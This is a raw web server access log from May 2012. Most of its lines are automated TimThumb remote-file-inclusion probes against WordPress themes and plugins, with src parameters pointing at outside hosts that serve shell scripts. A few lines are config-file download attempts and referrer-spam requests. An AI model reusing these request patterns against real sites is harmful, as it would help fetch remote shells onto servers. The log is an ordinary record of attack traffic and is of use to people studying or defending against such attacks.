90.198.87.118 - - [14/May/2012:06:09:17 +0200] "GET //wp-content/themes/PureType/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
184.173.6.208 - - [14/May/2012:06:09:56 +0200] "GET /stats/index.html//wp-content/themes/LondonLive/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
219.121.0.60 - - [14/May/2012:06:10:39 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:06:10:48 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:06:10:49 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
78.137.37.171 - - [14/May/2012:06:10:57 +0200] "GET /logs/access_log HTTP/1.0" 200 1371257 "http://plaandroid.info/sitemap217.html" "Mozilla/4.76 [en] (Windows NT 5.0; U)"
78.137.37.171 - - [14/May/2012:06:10:58 +0200] "GET /logs/access_log HTTP/1.0" 200 1371429 "http://plaandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:06:10:58 +0200] "GET /logs/access_log HTTP/1.0" 200 1371658 "http://plaandroid.info/sitemap217.html" "Mozilla/0.6 Beta (Windows)"
78.137.37.171 - - [14/May/2012:06:10:59 +0200] "GET /logs/access_log HTTP/1.0" 200 1371819 "http://plaandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:06:10:59 +0200] "GET /logs/access_log HTTP/1.0" 200 1372013 "http://plaandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
91.121.89.20 - - [14/May/2012:06:11:06 +0200] "GET /admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.121.89.20 - - [14/May/2012:06:11:06 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.121.89.20 - - [14/May/2012:06:11:06 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.121.89.20 - - [14/May/2012:06:11:06 +0200] "GET /admin/categories.php/login.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.9.215.134 - - [14/May/2012:06:11:26 +0200] "GET /stats//wp-content/themes/zcool-like/uploadify.php%00 HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:11:26 +0200] "GET //wp-content/themes/zcool-like/uploadify.php%00 HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
184.173.6.208 - - [14/May/2012:06:12:37 +0200] "GET /stats/log.keys.html//wp-content/themes/LondonLive/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:06:12:38 +0200] "GET //wp-content/themes/LondonLive/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:06:12:39 +0200] "GET /stats//wp-content/themes/LondonLive/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
90.198.87.118 - - [14/May/2012:06:13:12 +0200] "GET /stats//wp-content/themes/MyProduct/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:12 +0200] "GET /stats/log.keys.html//wp-content/themes/TheSource/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:13 +0200] "GET /stats//wp-content/themes/MyProduct/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:14 +0200] "GET /stats/log.keys.html//wp-content/themes/TheSource/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:15 +0200] "GET //wp-content/themes/MyProduct/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:17 +0200] "GET //wp-content/themes/MyProduct/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:17 +0200] "GET //wp-content/themes/TheSource/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:18 +0200] "GET //wp-content/themes/TheSource/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:20 +0200] "GET /stats//wp-content/themes/TheSource/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:13:22 +0200] "GET /stats//wp-content/themes/TheSource/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:13:23 +0200] "GET /stats//wp-content/themes/snapshot/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:13:26 +0200] "GET /stats//wp-content/themes/snapshot/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:13:29 +0200] "GET //wp-content/themes/snapshot/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:13:32 +0200] "GET //wp-content/themes/snapshot/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:14:20 +0200] "GET /stats//wp-content/themes/postcard/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:22 +0200] "GET /stats//wp-content/themes/postcard/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:23 +0200] "GET //wp-content/themes/postcard/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:25 +0200] "GET //wp-content/themes/postcard/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:45 +0200] "GET /stats//wp-content/themes/TheStyle/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:46 +0200] "GET /stats//wp-content/themes/TheStyle/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:53 +0200] "GET //wp-content/themes/TheStyle/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:06:14:55 +0200] "GET //wp-content/themes/TheStyle/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
64.9.215.134 - - [14/May/2012:06:14:59 +0200] "GET /stats//wp-content/themes/prosto/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
95.132.213.162 - - [14/May/2012:06:14:56 +0200] "GET /logs/access_log HTTP/1.0" 200 1380463 "http://androidenplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
64.9.215.134 - - [14/May/2012:06:15:02 +0200] "GET /stats//wp-content/themes/prosto/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:15:05 +0200] "GET //wp-content/themes/prosto/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:06:15:08 +0200] "GET //wp-content/themes/prosto/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
95.132.213.162 - - [14/May/2012:06:15:12 +0200] "GET /logs/access_log HTTP/1.0" 200 1381788 "http://androidenplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)"
95.132.213.162 - - [14/May/2012:06:15:28 +0200] "GET /logs/access_log HTTP/1.0" 200 1381996 "http://androidenplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
78.137.37.171 - - [14/May/2012:06:15:28 +0200] "GET /logs/access_log HTTP/1.0" 200 1381996 "http://plaandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:06:15:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1382445 "http://plaandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
78.137.37.171 - - [14/May/2012:06:15:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1382645 "http://plaandroid.info/sitemap224.html" "Mozilla/4.76 [en] (Windows NT 5.0; U)"
95.132.213.162 - - [14/May/2012:06:15:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1382645 "http://androidenplay.info/sitemap175.html" "Mozilla/4.76 [en] (Windows NT 5.0; U)"
78.137.37.171 - - [14/May/2012:06:15:30 +0200] "GET /logs/access_log HTTP/1.0" 200 1382817 "http://plaandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
78.137.37.171 - - [14/May/2012:06:15:30 +0200] "GET /logs/access_log HTTP/1.0" 200 1383195 "http://plaandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
95.132.213.162 - - [14/May/2012:06:15:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1383440 "http://androidenplay.info/sitemap175.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
125.88.125.201 - - [14/May/2012:06:15:34 +0200] "GET /stats/log.keys.html HTTP/1.0" 200 20219 "http://www.grupposeit.it/stats/log.keys.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
121.2.68.215 - - [14/May/2012:06:17:04 +0200] "GET /stats//wp-content/themes/irresistible/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
121.2.68.215 - - [14/May/2012:06:17:05 +0200] "GET //wp-content/themes/irresistible/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:06:17:52 +0200] "GET /stats//wp-content/themes/Minimal/tools/timthumb.php?src= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:06:17:52 +0200] "GET /stats//wp-content/themes/Minimal/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:06:17:52 +0200] "GET /stats//wp-content/themes/Minimal/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:06:17:52 +0200] "GET //wp-content/themes/Minimal/tools/timthumb.php?src= HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:06:17:52 +0200] "GET //wp-content/themes/Minimal/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:06:17:52 +0200] "GET //wp-content/themes/Minimal/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.160.5.94 - - [14/May/2012:06:17:56 +0200] "GET /stats//wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.160.5.94 - - [14/May/2012:06:17:56 +0200] "GET /stats//wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.160.5.94 - - [14/May/2012:06:17:56 +0200] "GET //wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.160.5.94 - - [14/May/2012:06:17:56 +0200] "GET //wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.12.73.138 - - [14/May/2012:06:18:28 +0200] "GET /stats//wp-content/themes/bizpress/timthumb.php?src=http://livinginrwanda.com/chat/bss.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
190.12.73.138 - - [14/May/2012:06:18:30 +0200] "GET /stats//wp-content/themes/bizpress/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
190.12.73.138 - - [14/May/2012:06:18:31 +0200] "GET //wp-content/themes/bizpress/timthumb.php?src=http://livinginrwanda.com/chat/bss.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
190.12.73.138 - - [14/May/2012:06:18:32 +0200] "GET //wp-content/themes/bizpress/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
184.173.6.208 - - [14/May/2012:06:19:17 +0200] "GET /stats//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:06:19:18 +0200] "GET //wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
90.198.87.118 - - [14/May/2012:06:19:37 +0200] "GET /stats//wp-content/themes/eGamer/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:19:38 +0200] "GET /stats//wp-content/themes/eGamer/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:19:40 +0200] "GET //wp-content/themes/eGamer/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
90.198.87.118 - - [14/May/2012:06:19:41 +0200] "GET //wp-content/themes/eGamer/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
176.28.19.216 - - [14/May/2012:06:19:42 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://picasa.communication.mintweb.dk/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
176.28.19.216 - - [14/May/2012:06:19:43 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://picasa.communication.mintweb.dk/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:06:19:43 +0200] "GET /stats/index.html/wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:06:19:43 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:06:19:43 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:06:19:55 +0200] "GET /stats//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:06:19:56 +0200] "GET //wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
85.238.107.233 - - [14/May/2012:06:20:02 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:06:20:01 +0200] "GET /logs/access_log HTTP/1.0" 200 1391437 "http://plaandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)"
85.238.107.233 - - [14/May/2012:06:20:03 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:06:20:02 +0200] "GET /logs/access_log HTTP/1.0" 200 1391920 "http://plaandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)"
78.137.37.171 - - [14/May/2012:06:20:03 +0200] "GET /logs/access_log HTTP/1.0" 200 1392384 "http://plaandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
78.137.37.171 - - [14/May/2012:06:20:03 +0200] "GET /logs/access_log HTTP/1.0" 200 1392619 "http://plaandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:06:20:04 +0200] "GET /logs/access_log HTTP/1.0" 200 1392823 "http://plaandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)"
176.28.19.216 - - [14/May/2012:06:20:12 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://picasa.communication.mintweb.dk/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
176.28.19.216 - - [14/May/2012:06:20:12 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://picasa.communication.mintweb.dk/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:06:20:13 +0200] "GET /stats/wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:06:20:13 +0200] "GET /wp-content/themes/ePhoto/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.198.87.118 - - [14/May/2012:06:20:19 +0200] "GET /stats//wp-content/themes/object/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
